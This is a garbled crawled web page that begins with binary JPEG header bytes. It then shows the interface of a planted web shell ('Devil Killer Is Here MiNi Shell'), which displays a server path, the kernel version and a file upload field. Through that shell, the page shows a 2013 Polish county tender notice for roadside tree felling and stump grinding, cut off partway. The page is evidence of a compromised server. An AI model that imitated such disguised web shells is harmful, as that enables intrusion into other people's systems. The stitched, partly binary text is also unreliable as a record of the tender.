JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130206/19231-N-2013.html

<p class="kh_header"><b>Pruszcz Gdański: Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego  w 2013 roku</b><br>
<b>Numer ogłoszenia: 19231 - 2013; data zamieszczenia: 06.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego  w 2013 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usługi związanej z zagospodarowaniem terenów zieleni polegającej na: wycince drzew, podcince suchych gałęzi drzew oraz frezowaniu pni drzew w pasach drogowych dróg powiatowych położonych na terenie Powiatu Gdańskiego w 2013 roku.
2. Zakres przedmiotu zamówienia:
Usługa zostanie wykonana w ramach 4 zadań:
 1) Zadanie nr 1 - wycinka drzew w pasach drogowych dróg powiatowych położonych na terenie Powiatu Gdańskiego w 2013 roku:
- roboty przygotowawcze,
- dostarczanie sprzętu i narzędzi na koszt własny Wykonawcy do miejsca wycinki,
- wycinka drzew przy użyciu podnośnika lub wycinka drzew bez użycia podnośnika,
- wywóz  transportem  własnym Wykonawcy pozyskanego odpłatnie drewna na rzecz Wykonawcy,
 - odtransportowanie sprzętu i narzędzi,
- oczyszczenie terenu po wycince drzew,
- zabezpieczenie  miejsca  wycinki  zgodnie  z  obowiązującymi  przepisami  o   ruchu drogowym (sporządzenie na własny koszt i  przestrzeganie  sporządzonego  projektu  organizacji ruchu na czas wykonywanej usługi).
2) Zadanie  nr  2  -   wycinka   drzew   w   pasach   drogowych   dróg   powiatowych   w  ramach  zadania  inwestycyjnego pn.: Poprawa bezpieczeństwa na  drogach Powiatu Gdańskiego poprzez modernizację dróg położonych na terenie Powiatu Gdańskiego:
- roboty przygotowawcze,
- dostarczanie sprzętu i narzędzi na koszt własny Wykonawcy do miejsca wycinki,
- wycinka drzew przy użyciu podnośnika lub wycinka drzew bez użycia podnośnika,
- wywóz  transportem  własnym Wykonawcy pozyskanego odpłatnie drewna na rzecz  Wykonawcy,
- odtransportowanie sprzętu i narzędzi,
- oczyszczenie terenu po wycince drzew,
- zabezpieczenie  miejsca  wycinki  zgodnie  z  obowiązującymi  przepisami  o   ruchu drogowym (sporządzenie na własny koszt i  przestrzeganie  sporządzonego  projektu organizacji ruchu na czas wykonywanej usługi).
UWAGA:
Drzewa rosnące w pasie drogowym stanowią własność zarządcy drogi tj. Zarządu Powiatu Gdańskiego. Wykonawca zobowiązuje się zakupić uzyskane w wyniku wycinki  drewno w cenie 40 zł na mp (po wcześniejszym oszacowaniu masy drewna). Ustaloną kwotę należy wpłacić 
w kasie Starostwa Powiatowego w Pruszczu Gdańskim, przy ul. Wojska Polskiego 16  - Wydział Komunikacji.
3) Zadanie nr 3 - podcinka  suchych gałęzi drzew w pasach drogowych dróg 
powiatowych położonych na terenie Powiatu Gdańskiego w 2013 roku:
- roboty przygotowawcze,
- dostarczanie   sprzętu   i   narzędzi   na    koszt    własny   Wykonawcy   do   miejsca wykonywanej usługi,
- usunięcie    gałęzi,     konarów     drzew    uszkodzonych,    uschniętych,   złamanych znajdujących się w skrajni drogowej,
- usunięcie  i  odwiezienie  transportem  własnym  Wykonawcy  uzyskanych  na rzecz Wykonawcy gałęzi i konarów,
- odtransportowanie sprzętu i narzędzi,
- oczyszczenie terenu po wykonaniu usługi,
- zabezpieczenie miejsca wykonywanych usług zgodnie z obowiązującymi przepisami o  ruchu  drogowym  (sporządzenie  na własny koszt i przestrzeganie sporządzonego projektu organizacji ruchu na czas wykonywanej usługi).  
4)  Zadanie nr 4 - Frezowanie pni drzew w pasach drogowych dróg powiatowych 
 położonych na terenie Powiatu Gdańskiego w 2013 roku:
- roboty przygotowawcze,
- dostarczanie   sprzętu     i   narzędzi   na   koszt   własny   Wykonawcy   do   miejsca wykonywanej usługi,
- wyfrezowanie  pni   drzew   do   40   cm  wysokości pnia, maksymalnie do 10 cm od poziomu ziemi, 
- usunięcie    ( uprzątnięcie ) /odwiezienie     transportem      własnym      Wykonawcy wyfrezowanych pni drzew, które znajdowały się przy posesjach prywatnych itp. (nie ma konieczności uprzątnięcia wyfrezowanych pni w terenie otwartym),
- odtransportowanie sprzętu i narzędzi,
- zabezpieczenie miejsca wykonywanych usług zgodnie z obowiązującymi przepisami o ruchu drogowym (sporządzenie na własny  koszt  i  przestrzeganie  sporządzonego projektu organizacji ruchu na czas wykonywanej usługi).  
UWAGA:
Zamawiający zastrzega sobie możliwość zwiększenia zakresu przedmiotu zamówienia w ramach robót uzupełniających dla każdego z zadań.
3.Szczegółowy    zakres     przedmiotu     zamówienia     określa    specyfikacja   techniczna stanowiąca załącznik nr 7 do niniejszej specyfikacji istotnych warunków zamówienia oraz wykaz dróg powiatowych ( załącznik nr 6 do SIWZ).
  4.  Usługi  z  zakresu  przedmiotu  zamówienia  klasyfikuje  się wg PKWiU pod numerem  81.30.10.0  Usługi związane z zagospodarowaniem terenów zieleni. 
W związku z powyższym powyższe usługi objęte są  8  % stawką podatku VAT..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art.36 ust. 2, pkt. 3 ustawy, Zamawiający przewiduje możliwość udzielenia w okresie trwania umowy ewentualnych zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wnosi się przed upływem terminu składania ofert.
Wykonawca zobowiązany jest do wniesienia wadium w wysokości 350,00 zł (słownie: trzysta pięćdziesiąt złotych 00/100) dla zadania nr 1, a dla zadania nr 2, 3 i 4  w wysokości 200,00 zł (słownie: dwieście złotych 00/100 ) najpóźniej w dniu składania ofert przed godz. 11.30 dnia 15.02.2013 r. 
W przypadku jeżeli do godz. 11:30 dnia 15.02.2013r . nie wpłynie wymagana kwota wadium na konto Zamawiającego, będzie to oznaczało, że wadium nie zostało wniesione.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się prowadzeniem działalności w zakresie związanym z zagospodarowaniem terenów zieleni.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się wykonaniem                   w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy  -  tym okresie, minimum 2 usług odpowiadających swym rodzajem przedmiotowi zamówienia o wartości łącznej  nie mniejszej niż 10.000 zł - dla każdego zadania. Do wykazu (zał. nr 4 do SIWZ) należy dołączyć dokumenty potwierdzające należyte wykonanie wymienionych usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (wzór zał. nr 1A,1B,1C,1D do SIWZ),
2. Podpisany wzór umowy (zał. nr  5A,5B,5C,5D do SIWZ),
3. Wykaz wykonanych usług ( wzór zał. nr 4 do SIWZ).
UWAGA:
W  przypadku  Wykonawców  prowadzących  jednoosobową  działalność gospodarczą lub wspólników spółki cywilnej, po wyborze najkorzystniejszej oferty,  a przed podpisaniem umowy  wybrany Wykonawca zobowiązany jest dostarczyć  do Zamawiającego aktualny odpis z  Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczpospolitej Polskiej w celu prawidłowego przygotowania umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 Ustawy Prawo Zamówień Publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia  co najmniej jednego ze zdarzeń: 	
- wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki podatku VAT, mające wpływ na wysokość ceny brutto za świadczoną usługę;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja nieodpłatna  -  ewentualne koszty przesyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2013 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101
Termin otwarcia ofert: 15.02.2013 r., o godz. 12:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego w 2013 roku
zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego  w 2013 roku
1) Zadanie nr 1 - wycinka drzew w pasach drogowych dróg powiatowych położonych na terenie Powiatu Gdańskiego w 2013 roku:
- roboty przygotowawcze,
- dostarczanie sprzętu i narzędzi na koszt własny Wykonawcy do miejsca wycinki,
- wycinka drzew przy użyciu podnośnika lub wycinka drzew bez użycia podnośnika,
- wywóz  transportem  własnym Wykonawcy pozyskanego odpłatnie drewna na rzecz  Wykonawcy,
 - odtransportowanie sprzętu i narzędzi,
- oczyszczenie terenu po wycince drzew,
- zabezpieczenie  miejsca  wycinki  zgodnie  z  obowiązującymi  przepisami  o   ruchu drogowym (sporządzenie na własny koszt i  przestrzeganie  sporządzonego  projektu  organizacji ruchu na czas wykonywanej usługi).
UWAGA:
Drzewa rosnące w pasie drogowym stanowią własność zarządcy drogi tj. Zarządu Powiatu Gdańskiego. Wykonawca zobowiązuje się zakupić uzyskane w wyniku wycinki  drewno w cenie 40 zł na mp (po wcześniejszym oszacowaniu masy drewna). Ustaloną kwotę należy wpłacić w kasie Starostwa Powiatowego w Pruszczu Gdańskim, przy ul. Wojska Polskiego 16  - Wydział Komunikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego  w 2013 roku
zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego  w 2013 roku
Zadanie  nr  2  -   wycinka   drzew   w   pasach   drogowych   dróg   powiatowych   w  ramach  zadania  inwestycyjnego pn.: Poprawa bezpieczeństwa na  drogach Powiatu Gdańskiego poprzez modernizację dróg położonych na terenie Powiatu Gdańskiego:
- roboty przygotowawcze,
- dostarczanie sprzętu i narzędzi na koszt własny Wykonawcy do miejsca wycinki,
- wycinka drzew przy użyciu podnośnika lub wycinka drzew bez użycia podnośnika,
- wywóz  transportem  własnym Wykonawcy pozyskanego odpłatnie drewna na rzecz  Wykonawcy,
- odtransportowanie sprzętu i narzędzi,
- oczyszczenie terenu po wycince drzew,
- zabezpieczenie  miejsca  wycinki  zgodnie  z  obowiązującymi  przepisami  o   ruchu drogowym (sporządzenie na własny koszt i  przestrzeganie  sporządzonego  projektu organizacji ruchu na czas wykonywanej usługi).
UWAGA:
Drzewa rosnące w pasie drogowym stanowią własność zarządcy drogi tj. Zarządu Powiatu Gdańskiego. Wykonawca zobowiązuje się zakupić uzyskane w wyniku wycinki  drewno w cenie 40 zł na mp (po wcześniejszym oszacowaniu masy drewna). Ustaloną kwotę należy wpłacić w kasie Starostwa Powiatowego w Pruszczu Gdańskim, przy ul. Wojska Polskiego 16  - Wydział Komunikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego  w 2013 roku
zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego  w 2013 roku
Zadanie nr 3 - podcinka  suchych gałęzi drzew w pasach drogowych dróg 
powiatowych położonych na terenie Powiatu Gdańskiego w 2013 roku:
- roboty przygotowawcze,
- dostarczanie   sprzętu   i   narzędzi   na    koszt    własny   Wykonawcy   do   miejsca wykonywanej usługi,
- usunięcie    gałęzi,     konarów     drzew    uszkodzonych,    uschniętych,   złamanych  znajdujących się w skrajni drogowej,
- usunięcie  i  odwiezienie  transportem  własnym  Wykonawcy  uzyskanych  na rzecz Wykonawcy gałęzi i konarów,
- odtransportowanie sprzętu i narzędzi,
- oczyszczenie terenu po wykonaniu usługi,
- zabezpieczenie miejsca wykonywanych usług zgodnie z obowiązującymi przepisami  o  ruchu  drogowym  (sporządzenie  na własny koszt i przestrzeganie sporządzonego projektu organizacji ruchu na czas wykonywanej usługi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego w 2013 roku
Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie  usługi  związanej  z   zagospodarowaniem  terenów  zieleni polegającej na: wycince drzew, podcince  suchych gałęzi drzew oraz  frezowaniu  pni  drzew  w  pasach drogowych dróg  powiatowych    położonych   na   terenie   Powiatu   Gdańskiego w 2013 roku
